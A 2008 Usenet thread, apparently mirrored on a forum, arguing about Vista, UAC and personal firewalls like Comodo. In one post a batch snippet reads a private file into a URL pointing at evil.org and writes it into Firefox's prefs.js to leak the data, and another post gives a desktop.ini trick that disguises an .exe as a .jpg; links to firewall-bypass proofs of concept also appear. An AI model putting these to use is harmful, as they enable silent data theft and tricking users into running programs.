PDA

View Full Version : Microsoft Firewall vs ????



quodnomentibi@remailed.ws
03-25-08, 12:35 AM
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

I just got a new laptop a few days ago, running Vista Home Premium. I am
in the midst of "customizing" it. Presently, I am running the Microsoft
Firewall. Is this an act of blind faith on my part. In the last few
months of life of my last laptop, I ran Comodo Pro and was satisfied.

I'd prefer to run a free firewall, if that is prudent.

Any suggestions?

Thanks for your time and attention.

Q.N. Tibi

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.8.2 (Build 3005)
Comment: Protect Your Privacy With Encryption! www.pgp.com
Charset: utf-8

wsFVAwUBR+huJnAfpDHwMsutAQh1Ig//cx0fN32FtYk4yww/2Jky9xd/dOL38F0r
eOzNSBBqoh3g1Hu+60R0lWnNakNISGqiTGirp/nUeUaPzXCXq6qKF5oXGbc6E05Y
UHssKXRIMkDoff7CjY1B3d52g9qIj+/xePosr9OiL4+WMF7XDvRgNttFe/+bV3ef
ETOwPifNE+kt2Zp1aPDcBd1Jj3zn1f637qXPlDfiWsVqzSKC0+OFbjUlZsOxIZ6F
JHsCtU3FdYqtKig+skbpYCSv/o+HUBqBLNvHhBZbm0rRA2LfIMEVVGZEexfqpMiu
iDidgCDZBrdJU3hQ2i77zolNSRwP8IleaO0yjMqJDenE2YFmcgacvi7QfpKlfVcn
2+4eKg8q4XRHaJF1pBeSzNLLrka5zSlImK8cwIm15WwtEbcH8Apb0GxZCnVrOnI9
0GFlkXPBs4PjZd3DlLMPH0vRehtA3ctSYluiAZ/ur5hznw9sjin0iq6AB5oxFIMB
rSBjdQtWs059Wg4L2DfTLbk5d2tBvVSSv4vt1plZGs1LsfBPybxWiQ3YaYZR+ZtN
r4dRa4bq2b5WbXB+f6DbAvmpVtKKShW23pMtNYInOVsfgxx+n/o5O0jW7meOgUIG
I6Evbsj89LqWyfrwIf/T6CBch2m16CEoFbQM9YTzygRfHA3tZYF44iEimQi2MZb2
EFBQXjwBaIY=
=4Ygx
-----END PGP SIGNATURE-----

Sebastian G.
03-25-08, 01:06 AM
quodnomentibi@remailed.ws wrote:


> I just got a new laptop a few days ago, running Vista Home Premium. I am
> in the midst of "customizing" it. Presently, I am running the Microsoft
> Firewall. Is this an act of blind faith on my part.


Yes. Windows Vista is trivially insecure.

> In the last few
> months of life of my last laptop, I ran Comodo Pro and was satisfied.


The only question is if this wasn't even worse.


> I'd prefer to run a free firewall, if that is prudent.
>
> Any suggestions?


Wipfw. But first you need to get rid of Vista.

Kayman
03-25-08, 04:29 AM
On Mon, 24 Mar 2008 23:35:12 -0600 (MDT), quodnomentibi@remailed.ws wrote:
>
> I just got a new laptop a few days ago, running Vista Home Premium. I am
> in the midst of "customizing" it. Presently, I am running the Microsoft
> Firewall. Is this an act of blind faith on my part. In the last few
> months of life of my last laptop, I ran Comodo Pro and was satisfied.
>
> I'd prefer to run a free firewall, if that is prudent.
>
> Any suggestions?
>
The best defenses are:
1. Do not work in elevated level; Day-to-day work should be
performed while the User Account Control (UAC) is enabled. Turning
off UAC reduces the security of your computer and may expose you to
increased risk from malicious software.
2. Familiarize yourself with "Services Hardening in Windows Vista".
3. Keep your operating (OS) system (and all software on it)
updated/patched.
4. Reconsider the usage of IE.
5. Review your installed 3rd party software applications/utilities;
Remove clutter.
6. Don't expose services to public networks.
7. Activate the build-in firewall and tack together its advanced
configuration settings.
7a.If on high-speed internet use a router as well.
8. Routinely practice safe-hex.
9. Regularly back-up data/files.
10.Familiarize yourself with crash recovery tools and with
re-installing your operating system (OS).
11.Utilize a real-time anti-virus application and vital system
monitoring utilities/applications.
12.Keep abreast of the latest developments - ***** happens...you know.

The least preferred defenses are:
Myriads of popular anti-whatever applications and staying ignorant.

Peez of pith, really :-)

Sebastian G.
03-25-08, 05:55 AM
Kayman wrote:


> The best defenses are:
> 1. Do not work in elevated level;


Doesn't matter; in Windows Vista it's trivial to elevate with any consent.

> Day-to-day work should be
> performed while the User Account Control (UAC) is enabled.


UAC is trivial to spoof, and since it doesn't apply to all administrative
actions it's trivially insecure. Even further, since there's no need to
approve administrative actions if an elevated program is running in the
desktop context of an unprivileged, it's even more insecure.


> 4. Reconsider the usage of IE.


There is nothing to reconsider. IE is a perfectly fine ActiveX Rich Platform
Client, a wonderful platform to implement complex software clients in a
trusted environment.
The only problem is that some people seem to understand it a webbrowser, and
consequently abuse it as such. Obviously a stupid idea.

> 7a.If on high-speed internet use a router as well.


Huh? Why?

> 9. Regularly back-up data/files.


And why isn't this #1?

> 11.Utilize a real-time anti-virus application


Wonderful idea. Introduce a horribly buggy and pretty useless piece of
software....

Victek
03-25-08, 11:22 AM
> I just got a new laptop a few days ago, running Vista Home Premium. I am
> in the midst of "customizing" it. Presently, I am running the Microsoft
> Firewall. Is this an act of blind faith on my part. In the last few
> months of life of my last laptop, I ran Comodo Pro and was satisfied.
>
> I'd prefer to run a free firewall, if that is prudent.
>
> Any suggestions?
>
> Thanks for your time and attention.
>
> Q.N. Tibi

I'm running Comodo firewall pro v3 on Vista and it's been fine. I also like
Online Armor and there will be a Vista compatible version in the near
future.

Sebastian G.
03-25-08, 03:05 PM
Victek wrote:


> I'm running Comodo firewall pro v3 on Vista and it's been fine.


Which only shows that you never bothered auditing it.

> I also like Online Armor

Which supports my claim, since this one is even worse.

OK, one shouldn't expect much if any understanding of security from a
Windows Live Mail user... but please, if you have no clue, then please don't
make suggestions to others.

s|b
03-25-08, 03:25 PM
On Tue, 25 Mar 2008 21:05:56 +0100, Sebastian G. wrote:

> OK, one shouldn't expect much if any understanding of security from a
> Windows Live Mail user... but please, if you have no clue, then please don't
> make suggestions to others.

It's a good thing you are here to show us The Way, oh Wise One... |-)

--
s|b

goarilla
03-26-08, 01:44 PM
Sebastian G. wrote:
> quodnomentibi@remailed.ws wrote:
>
>
>> I just got a new laptop a few days ago, running Vista Home Premium. I am
>> in the midst of "customizing" it. Presently, I am running the Microsoft
>> Firewall. Is this an act of blind faith on my part.
>
>
> Yes. Windows Vista is trivially insecure.
>
do you have some evidence stating that fact?
are you talking about microsoft os'es in general?
since i really need some evidence to put on the table
so my boss stops looking into vista as a worthy domain
OS
>> In the last few
>> months of life of my last laptop, I ran Comodo Pro and was satisfied.
>
>
> The only question is if this wasn't even worse.
>
>
>> I'd prefer to run a free firewall, if that is prudent.
>>
>> Any suggestions?
>
>
> Wipfw. But first you need to get rid of Vista.

Sebastian G.
03-26-08, 01:49 PM
goarilla <"kevin<punt>paulus|"@|skynet punt> wrote:


>> Yes. Windows Vista is trivially insecure.
>>
> do you have some evidence stating that fact?


- you can spoof filename via desktop.ini, which itself can be triggered by
shell namespaces
- UAC doesn't apply to all administrative actions and is trivial to spoof;
if you run as admin, it is trivial to circumvent; it provides no isolation;
if a file includes a prudent application manifest or triggers the setup
program detection, it won't even let you run a program without elevation
- PatchGuard makes it trivial to corrupt kernel memory just by debugging an
application in usermode
- not even talking about what system access you get granted for simply
presenting a DRMed media file...

> are you talking about microsoft os'es in general?


No. NT 5.1 and 5.2 look pretty secure.

> since i really need some evidence to put on the table
> so my boss stops looking into vista as a worthy domain
> OS


Oh, that's simple: Install it on his computer so he can try it for a while.
Very likely that after two weeks he'll be fed up with it.

Q
03-26-08, 04:45 PM
Sebastian G. wrote:

> Wipfw. But first you need to get rid of Vista.

Please qualify your comment about issues with Vista security. As you
always do, you talk out of your arse.

Sebastian G.
03-26-08, 06:54 PM
Q wrote:

> Sebastian G. wrote:
>
>> Wipfw. But first you need to get rid of Vista.
>
> Please qualify your comment about issues with Vista security. As you
> always do, you talk out of your arse.


<news:64vk7lF25nl57U1@mid.dfncis.de>

Q
03-26-08, 07:16 PM
Sebastian G. wrote:

> <news:64vk7lF25nl57U1@mid.dfncis.de>

Is that your email address and news should be mail?

Why can't you post proof of concept links here? Sorry for the talking
out of your arse comment. It was uncalled for. Would just like to see
some proof of what you say though.

Sebastian G.
03-26-08, 10:56 PM
Q wrote:

> Sebastian G. wrote:
>
>> <news:64vk7lF25nl57U1@mid.dfncis.de>
>
> Is that your email address and news should be mail?


No, it's a reference to one of my postings in this thread. Is your
newsreader that defective?

> Why can't you post proof of concept links here?


Actually you can easily derive a PoC just from the description. For example
the filename localization issue is well known, and you can take already
existing desktop.ini files utilizing this feature directly from the Vista
installation. Or, for example, a privilege that doesn't UAC consent is
SE_BACKUP_RESTORE_PRIVILEGE, which allows you to bypass all ACLs and grants
access to the raw disk.
On the other hand, you'll find in-detail information about the
implementation of PatchGuard at <http://uninformed.org/>. With a bit
detailed understanding, you'll see that debugging heavily interacts with
PatchGuard in almost unforseen ways (since it is, by itselt, nothing but a
dirty kernel hack).

Rat River Cemetary
03-26-08, 11:14 PM
Sebastian G. wrote:
>
> No, it's a reference to one of my postings in this thread. Is your
> newsreader that defective?

There is no proof in any of your postings to this thread.

Rat River Cemetary
03-26-08, 11:42 PM
Sebastian G. wrote:

> Actually you can easily derive a PoC just from the description. For
> example the filename localization issue is well known, and you can take
> already existing desktop.ini files utilizing this feature directly from
> the Vista installation. Or, for example, a privilege that doesn't UAC
> consent is SE_BACKUP_RESTORE_PRIVILEGE, which allows you to bypass all
> ACLs and grants access to the raw disk.
> On the other hand, you'll find in-detail information about the
> implementation of PatchGuard at <http://uninformed.org/>. With a bit
> detailed understanding, you'll see that debugging heavily interacts with
> PatchGuard in almost unforseen ways (since it is, by itselt, nothing but
> a dirty kernel hack).

Every OS has exploits and is continually being patched. Linux has plenty
of it's own, you just don't hear about them as much or they get patched
quietly in the background. So your whole point is what exactly?

Sebastian G.
03-27-08, 12:21 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Actually you can easily derive a PoC just from the description. For
>> example the filename localization issue is well known, and you can take
>> already existing desktop.ini files utilizing this feature directly from
>> the Vista installation. Or, for example, a privilege that doesn't UAC
>> consent is SE_BACKUP_RESTORE_PRIVILEGE, which allows you to bypass all
>> ACLs and grants access to the raw disk.
>> On the other hand, you'll find in-detail information about the
>> implementation of PatchGuard at <http://uninformed.org/>. With a bit
>> detailed understanding, you'll see that debugging heavily interacts with
>> PatchGuard in almost unforseen ways (since it is, by itselt, nothing but
>> a dirty kernel hack).
>
> Every OS has exploits and is continually being patched. Linux has plenty
> of it's own, you just don't hear about them as much or they get patched
> quietly in the background. So your whole point is what exactly?


Seems like you don't even understand the difference between random and
systematic errors...

Sebastian G.
03-27-08, 12:21 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>> No, it's a reference to one of my postings in this thread. Is your
>> newsreader that defective?
>
> There is no proof in any of your postings to this thread.


I never presented it as a proof, neither has been ask for some.

Rat River Cemetary
03-27-08, 11:26 AM
Sebastian G. wrote:

>
> I never presented it as a proof, neither has been ask for some.

I have and still see no positive proof from you.

Rat River Cemetary
03-27-08, 11:27 AM
Sebastian G. wrote:

> Seems like you don't even understand the difference between random and
> systematic errors...

Seems like you are nothing but a wind bag full of hot air. All talk and
no action.

Rat River Cemetary
03-27-08, 12:02 PM
Sebastian G. wrote:

> Which supports my claim, since this one is even worse.
>
> OK, one shouldn't expect much if any understanding of security from a
> Windows Live Mail user... but please, if you have no clue, then please
> don't make suggestions to others.

I saw you once post proof of concept code to prove that any software
firewall can be bypassed. Would you please post that again as I want to
read it again, thanks.

Rat River Cemetary
03-28-08, 02:05 AM
Sebastian G. wrote:

> Seems like you don't even understand the difference between random and
> systematic errors...

Still waiting for your proof. BTW, so are some other people over at a
reputable web forum. They claim you are a Usenet loon and have no actual
proof. Put up or shut up.

Volker Birk
03-28-08, 07:08 AM
Rat River Cemetary <dead@rat.here> wrote:
> I saw you once post proof of concept code to prove that any software
> firewall can be bypassed. Would you please post that again as I want to
> read it again, thanks.

Hi,

for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).

After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
breakout-wp.cpp - and they lost again.

This topic is somewhat boring now.

Yours,
VB.
--
The file name of an indirect node file is the string "iNode" immediately
followed by the link reference converted to decimal text, with no leading
zeroes. For example, an indirect node file with link reference 123 would
have the name "iNode123". - HFS Plus Volume Format, MacOS X

Sebastian G.
03-28-08, 07:58 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Which supports my claim, since this one is even worse.
>>
>> OK, one shouldn't expect much if any understanding of security from a
>> Windows Live Mail user... but please, if you have no clue, then please
>> don't make suggestions to others.
>
> I saw you once post proof of concept code to prove that any software
> firewall can be bypassed. Would you please post that again as I want to
> read it again, thanks.


You mean something like this one?

setlocal enabledelayedexpansion
set x=
for /f "delims=" %%i in (your_private_document.txt) do set x=!x! %%i
for /r %%i in (prefs.js) do echo
user_pref("browser.startup.homepage","http://evil.org/catch.pl?!x!");>>"%%i"

And then just wait until the user starts Firefox...

Sebastian G.
03-28-08, 07:59 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Seems like you don't even understand the difference between random and
>> systematic errors...
>
> Still waiting for your proof.


Are you really too stupid to simply write a desktop.ini with the content:

[LocalizedFilenames]
foo.exe=bar.jpg

and place it onto your desktop?

Victek
03-28-08, 11:09 AM
>> I saw you once post proof of concept code to prove that any software
>> firewall can be bypassed. Would you please post that again as I want to
>> read it again, thanks.
>
> Hi,
>
> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>
> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
> breakout-wp.cpp - and they lost again.
>
> This topic is somewhat boring now.
>
> Yours,
> VB.

No security is perfect. Why does the fact you can break it imply that it
has no value?

Victek
03-28-08, 11:09 AM
>> I saw you once post proof of concept code to prove that any software
>> firewall can be bypassed. Would you please post that again as I want to
>> read it again, thanks.
>
> Hi,
>
> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>
> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
> breakout-wp.cpp - and they lost again.
>
> This topic is somewhat boring now.
>
> Yours,
> VB.

No security is perfect. Why does the fact you can break it imply that it
has no value?

Volker Birk
03-28-08, 11:21 AM
Victek <victek@invalid.invalid> wrote:
>>> I saw you once post proof of concept code to prove that any software
>>> firewall can be bypassed. Would you please post that again as I want to
>>> read it again, thanks.
>> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
>> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
>> breakout-wp.cpp - and they lost again.
>> This topic is somewhat boring now.
> No security is perfect. Why does the fact you can break it imply that it
> has no value?

Because I needed 15 minutes to break the first time, and a meal with
friends on a Saturday evening to **** up the second time.

And: we had a closer look onto common "Personal Firewall"
implementations, and all what I saw was a terrible, incompetent mess.

Yours,
VB.
--
The file name of an indirect node file is the string "iNode" immediately
followed by the link reference converted to decimal text, with no leading
zeroes. For example, an indirect node file with link reference 123 would
have the name "iNode123". - HFS Plus Volume Format, MacOS X

Sebastian G.
03-28-08, 12:28 PM
Victek wrote:

>>> I saw you once post proof of concept code to prove that any software
>>> firewall can be bypassed. Would you please post that again as I want to
>>> read it again, thanks.
>> Hi,
>>
>> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
>> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>>
>> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
>> breakout-wp.cpp - and they lost again.
>>
>> This topic is somewhat boring now.
>>
>> Yours,
>> VB.
>
> No security is perfect. Why does the fact you can break it imply that it
> has no value?

Security requires reliability. The above shows a reliability of zero.

Rat River Cemetary
03-28-08, 03:50 PM
Sebastian G. wrote:

>
> Are you really too stupid to simply write a desktop.ini with the content:
>
> [LocalizedFilenames]
> foo.exe=bar.jpg
>
> and place it onto your desktop?

I'm talking about all of your claims and not just that one. Calling me
stupid does nothing for your credibility at all so either stop with the
hostile attitude and provide your own proof of concept or admit you are
a liar and nothing but a Usenet loon.

Sebastian G.
03-28-08, 04:00 PM
Rat River Cemetary wrote:


> I'm talking about all of your claims and not just that one. Calling me
> stupid does nothing for your credibility at all so either stop with the
> hostile attitude and provide your own proof of concept or admit you are
> a liar and nothing but a Usenet loon.


Or not willing to waste my time on trivial things that I consider being easy
enough for you to figure it out on your own. As if I would care what you're
thinking of me...

Rat River Cemetary
03-28-08, 09:19 PM
Sebastian G. wrote:

> Or not willing to waste my time on trivial things that I consider being
> easy enough for you to figure it out on your own. As if I would care
> what you're thinking of me...

Here's what my man on the inside has to say to you. Loon!

"Neither the batch commands, nor the .c programs are remote exploits of
a firewall. The batch files just seems to copy prefs.js around the
system, it doesn't attain Admin from a limited user nor does it execute
code on remote sysems, so it's not an exploit. Ditto for the .c
programs, they just send messages to other windows, windows is designed
to allow that. That is not demostration of a remote exploit or local
privilege escalation exploit.

Also, in Vista you can't send a high integrity process (admin services
and programs with admin privileges) a message from a lower integrity
processes, like say medium integrity (non-UAC prompting programs)
processes or low integrity processes (sandboxed programs like IE7). And
neither can low integrity processes send message to medium integrity
processes.
Ergo, something like this might work in XP but not in Vista if you run
as the system was designed to run (with UAC on).

What you asked about is Vista, and these are not Vista exploits."

Rat River Cemetary
03-28-08, 09:19 PM
Volker Birk wrote:

> Hi,
>
> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>
> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
> breakout-wp.cpp - and they lost again.
>
> This topic is somewhat boring now.
>
> Yours,
> VB.

Man on the inside says this.

"Neither the batch commands, nor the .c programs are remote exploits of
a firewall. The batch files just seems to copy prefs.js around the
system, it doesn't attain Admin from a limited user nor does it execute
code on remote sysems, so it's not an exploit. Ditto for the .c
programs, they just send messages to other windows, windows is designed
to allow that. That is not demostration of a remote exploit or local
privilege escalation exploit.

Also, in Vista you can't send a high integrity process (admin services
and programs with admin privileges) a message from a lower integrity
processes, like say medium integrity (non-UAC prompting programs)
processes or low integrity processes (sandboxed programs like IE7). And
neither can low integrity processes send message to medium integrity
processes.
Ergo, something like this might work in XP but not in Vista if you run
as the system was designed to run (with UAC on).

What you asked about is Vista, and these are not Vista exploits."

Rat River Cemetary
03-28-08, 09:24 PM
Sebastian G. wrote:

> Yes. Windows Vista is trivially insecure.

Care to comment on the below?

http://dvlabs.tippingpoint.com/blog/2008/03/28/pwn-to-own-final-day-and-wrap-up

Volker Birk
03-28-08, 09:50 PM
Rat River Cemetary <dead@rat.here> wrote:
> Volker Birk wrote:
>> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
>> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
>> breakout-wp.cpp - and they lost again.
>> This topic is somewhat boring now.
> Man on the inside says this.
> "Neither the batch commands, nor the .c programs are remote exploits of
> a firewall.

What "batch files"? Is this text about something else?

> What you asked about is Vista, and these are not Vista exploits."

I did not talk about Vista, but about "Personal Firewalls".

And I'm not talking about remote exploits or exploits at all.

Yours,
VB.
--
The file name of an indirect node file is the string "iNode" immediately
followed by the link reference converted to decimal text, with no leading
zeroes. For example, an indirect node file with link reference 123 would
have the name "iNode123". - HFS Plus Volume Format, MacOS X

Rat River Cemetary
03-28-08, 10:29 PM
Volker Birk wrote:

> What "batch files"? Is this text about something else?

Se3astion posted a batch file that I included in with your code. He is
referring to that.


> I did not talk about Vista, but about "Personal Firewalls".
>
> And I'm not talking about remote exploits or exploits at all.
>
> Yours,
> VB.

You're right.

Sebastian G.
03-29-08, 01:26 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Yes. Windows Vista is trivially insecure.
>
> Care to comment on the below?
>
> http://dvlabs.tippingpoint.com/blog/2008/03/28/pwn-to-own-final-day-and-wrap-up


Obviously the guy wanted the MacBook Air (I'd want it too), and the guys who
wanted the Wintel notebook didn't manage to prepare the pre-made IE exploits
fast enough.

Sebastian G.
03-29-08, 01:31 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Or not willing to waste my time on trivial things that I consider being
>> easy enough for you to figure it out on your own. As if I would care
>> what you're thinking of me...
>
> Here's what my man on the inside has to say to you. Loon!


See below for the obvious reasons why I don't care for the opinions of idiots...

> "Neither the batch commands, nor the .c programs are remote exploits of
> a firewall.


I never claimed a remote exploit.

> The batch files just seems to copy prefs.js around the
> system,


********. It reads the context of a file, puts in into a URL and writes to
prefs.js to set it as the default homepage. The next time the user starts up
Firefox, the homepage is surfed to, and the data are transmitted this way.

> it doesn't attain Admin from a limited user nor does it execute
> code on remote sysems, so it's not an exploit. Ditto for the .c
> programs, they just send messages to other windows, windows is designed
> to allow that. That is not demostration of a remote exploit or local
> privilege escalation exploit.


But it is an exploit against the application security feature of personal
firewalls.

> Also, in Vista you can't send a high integrity process (admin services
> and programs with admin privileges) a message from a lower integrity
> processes, like say medium integrity (non-UAC prompting programs)
> processes or low integrity processes (sandboxed programs like IE7).


Wrong as well. Clipboard commands, NetDDE and COM+ Remoting are allowed,
also Named Pipes, Mailslots, Shared Sections, BaseNameObjects, JobObjects
etc. are shared.

> What you asked about is Vista, and these are not Vista exploits."


Never claimed those to be Vista exploits, even though they work quite well
under Vista.

Rat River Cemetary
03-31-08, 10:56 AM
Sebastian G. wrote:

> Obviously the guy wanted the MacBook Air (I'd want it too), and the guys
> who wanted the Wintel notebook didn't manage to prepare the pre-made IE
> exploits fast enough.


IE7 on Vista runs in protected mode and is the most secure browser there
is because of it. Unless of course you run something like OB1 that
doesn't support any scripting at all. Because of your hostile attitude
and lack of objectivity I must end our conversation because you are not
worth my time and are a nasty ********ter. I hope others are smart
enough to see you for what you really are.

Sebastian G.
03-31-08, 11:51 AM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Obviously the guy wanted the MacBook Air (I'd want it too), and the guys
>> who wanted the Wintel notebook didn't manage to prepare the pre-made IE
>> exploits fast enough.
>
>
> IE7 on Vista runs in protected mode and is the most secure browser there
> is because of it.


Nonsense. IE by itself is as easy to compromise as ever, and breaking out of
the protected mode is trivial[1][2].

> Because of your hostile attitude
> and lack of objectivity I must end our conversation because you are not
> worth my time and are a nasty ********ter. I hope others are smart
> enough to see you for what you really are.

One should rather hope that others are smart enough to not fall for your
obviously ridiculous claims about others.

[1] http://uninformed.org/?v=8&a=6&t=sumry
[2] http://blogs.technet.com/markrussinovich/archive/2007/02/12/638372.aspx

Volker Birk
03-31-08, 11:36 PM
Rat River Cemetary <dead@rat.here> wrote:
> IE7 on Vista runs in protected mode and is the most secure browser there
> is because of it.

Unless IE stops supporting ActiveX and thus supporting manipulating
arbitrary COM objects, it's a security nightmare and not "the most
secure browser".

ActiveX is a design flaw, and never can be fixed.

Yours,
VB.
--
The file name of an indirect node file is the string "iNode" immediately
followed by the link reference converted to decimal text, with no leading
zeroes. For example, an indirect node file with link reference 123 would
have the name "iNode123". - HFS Plus Volume Format, MacOS X

Rat River Cemetary
04-01-08, 05:23 AM
Volker Birk wrote:

> Unless IE stops supporting ActiveX and thus supporting manipulating
> arbitrary COM objects, it's a security nightmare and not "the most
> secure browser".
>
> ActiveX is a design flaw, and never can be fixed.
>
> Yours,
> VB.

I use FF with noscipt but nothing can compromise the OS by running IE7
because it runs in protected memory space.

Sebastian G.
04-01-08, 05:48 AM
Rat River Cemetary wrote:


> I use FF with noscipt but nothing can compromise the OS by running IE7
> because it runs in protected memory space.


Unless you simply break out of it, which is trivial.

Volker Birk
04-01-08, 06:25 AM
Rat River Cemetary <dead@rat.here> wrote:
> Volker Birk wrote:
>> Unless IE stops supporting ActiveX and thus supporting manipulating
>> arbitrary COM objects, it's a security nightmare and not "the most
>> secure browser".
>> ActiveX is a design flaw, and never can be fixed.
> I use FF with noscipt but nothing can compromise the OS by running IE7
> because it runs in protected memory space.

That's wrong.

COM offers the possibility for IPC (DCOM, COM+).

Yours,
VB.
--
The file name of an indirect node file is the string "iNode" immediately
followed by the link reference converted to decimal text, with no leading
zeroes. For example, an indirect node file with link reference 123 would
have the name "iNode123". - HFS Plus Volume Format, MacOS X

goarilla@work
04-02-08, 05:17 AM
Sebastian G. wrote:
> Q wrote:
>
>> Sebastian G. wrote:
>>
>>> <news:64vk7lF25nl57U1@mid.dfncis.de>
>>
>> Is that your email address and news should be mail?
>
>
> No, it's a reference to one of my postings in this thread. Is your
> newsreader that defective?
>
thunderbird doesn't understand it as well

Sebastian G.
04-02-08, 06:03 AM
goarilla@work wrote:

> Sebastian G. wrote:
>> Q wrote:
>>
>>> Sebastian G. wrote:
>>>
>>>> <news:64vk7lF25nl57U1@mid.dfncis.de>
>>> Is that your email address and news should be mail?
>>
>> No, it's a reference to one of my postings in this thread. Is your
>> newsreader that defective?
>>
> thunderbird doesn't understand it as well


Very srange, since Mozilla Mail does. Maybe the URL protocol helper for
"news:" is broken?

Rat River Cemetary
04-02-08, 02:23 PM
Sebastian G. wrote:

> Very srange, since Mozilla Mail does. Maybe the URL protocol helper for
> "news:" is broken?

I use portable Thunderbird for news so it is not registered in the
registry as my news reader. When I clicked your link Microsoft Mail
tried to open it because that is what is registered on my system for
news but I only use that for Mail and not news. You should not assume
everyone has their PC configured the same as you.

Sebastian G.
04-02-08, 02:25 PM
Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Very srange, since Mozilla Mail does. Maybe the URL protocol helper for
>> "news:" is broken?
>
> I use portable Thunderbird for news so it is not registered in the
> registry as my news reader. When I clicked your link Microsoft Mail
> tried to open it because that is what is registered on my system for
> news but I only use that for Mail and not news. You should not assume
> everyone has their PC configured the same as you.


Now it's my fault that you didn't set it up properly... "news:" is one of
the few well known protocol handlers which one may safely assume to be working.

Even further, it's the standard way of referencing Usenet postings. Even
further, there simply is no other.

Dave
04-03-08, 02:04 AM
goarilla <"kevin<punt>paulus|"@|skynet punt> wrote:
> Sebastian G. wrote:
>> quodnomentibi@remailed.ws wrote:
>>
>>
>>> I just got a new laptop a few days ago, running Vista Home Premium.
>>> I am
>>> in the midst of "customizing" it. Presently, I am running the Microsoft
>>> Firewall. Is this an act of blind faith on my part.
>>
>>
>> Yes. Windows Vista is trivially insecure.


Personally I think a hardware firewall is well worth having. Mine only
allows out the ports I want, and some like lookups to DNS servers and
time servers are only allowed to certain IP addresses.

I don't know how insecure Vista is (Ive personally not been knowingly
hacked), but I do agree it is a poor operating system. I had Vista
Business supplied on my high end laptop, then payed for an upgrade to
Vista Ultimate. I've since repartitioned the disk to Solaris x86, but
I'm going to fit a larger disk (300 GB from 120 GB), and then partition
as XP and Solaris x86.

So despite having Vista Ultimate, on a laptop which costs about $3200
only 13 months ago (dual core 2 GHz, 2 GB RAM), I have come to the
conclusion it requires too much resources from my high-end laptop.

You really should try Solaris x86 and see how snappy a machine feels
compares to one running Vista. I've not managed to get drivers for
either the camera or the fingerprint reader, but those are minor
irritations compared to the slowness of Vista and the fact many programs
have issues when running under Vista.

Sebastian G.
04-03-08, 03:58 AM
Dave wrote:


> You really should try Solaris x86 and see how snappy a machine feels
> compares to one running Vista. I've not managed to get drivers for
> either the camera or the fingerprint reader, but those are minor
> irritations compared to the slowness of Vista and the fact many programs
> have issues when running under Vista.


This fact is, sadly, well documented. With Windows 2000 Microsoft decided on
a subset of he Win32 API known as NT5 API, which they guaranteed to keep
consistent on all Windows versions till at least 2012, and strongly advised
all newly developed programs to restrict themselves to this subset for the
sake of forward and backward compatibility. Now with Vista they've already
broken this promise, f.e. they've removed the ShellItemIDList stuff and
fully replaced it with Windows Search 4.0 Item Containers (and didn't even
offer a marshaller stub, which would be trivial to implement).

goarilla@work
04-07-08, 08:47 AM
Sebastian G. wrote:
> goarilla@work wrote:
>
>> Sebastian G. wrote:
>>> Q wrote:
>>>
>>>> Sebastian G. wrote:
>>>>
>>>>> <news:64vk7lF25nl57U1@mid.dfncis.de>
>>>> Is that your email address and news should be mail?
>>>
>>> No, it's a reference to one of my postings in this thread. Is your
>>> newsreader that defective?
>>>
>> thunderbird doesn't understand it as well
>
>
> Very srange, since Mozilla Mail does. Maybe the URL protocol helper for
> "news:" is broken?

maybe ... but well ...
how do i check ?

tried looking in HKCR\... for news:/
but damn
i miss mailcap ?

Sebastian G.
04-07-08, 11:40 AM
goarilla@work wrote:


>>> thunderbird doesn't understand it as well
>>
>> Very srange, since Mozilla Mail does. Maybe the URL protocol helper for
>> "news:" is broken?
>
> maybe ... but well ...
> how do i check ?
>
> tried looking in HKCR\... for news:/
> but damn
> i miss mailcap ?


On Windows it should be HKCR\news, entitled as "URL:News Protocol" and "URL
Protocol", and the "open" shell verb gives the handler.

However, it is well known that both Thunderbird and Mozilla Mail don't set
this properly when installed and running without admin privileges, so you
have to do it manually.